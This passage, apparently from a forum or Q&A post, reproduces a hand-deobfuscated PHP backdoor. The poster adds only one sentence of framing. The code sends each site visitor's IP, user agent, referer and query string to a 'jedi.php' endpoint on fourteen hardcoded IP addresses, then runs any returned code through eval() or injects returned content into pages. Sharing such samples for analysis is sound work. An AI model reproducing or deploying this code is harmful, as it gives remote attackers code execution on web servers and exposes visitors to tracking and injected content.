}
ob_start("opanki");
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(FILE);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
}
else {
$ip = "";
}
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
}
else {
$ref = "";
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
}
else {
$ua = "";
}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
}
else {
$qs = "";
}
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(@file_get_contents($url_0 . $url_1));
$try = false;
}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult)); e
val($z);
exit();
}
if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);
return true;
}
else {
return false;
}
}
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
break ;
}
}
}
Unpacked by hand so its more readable :)
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.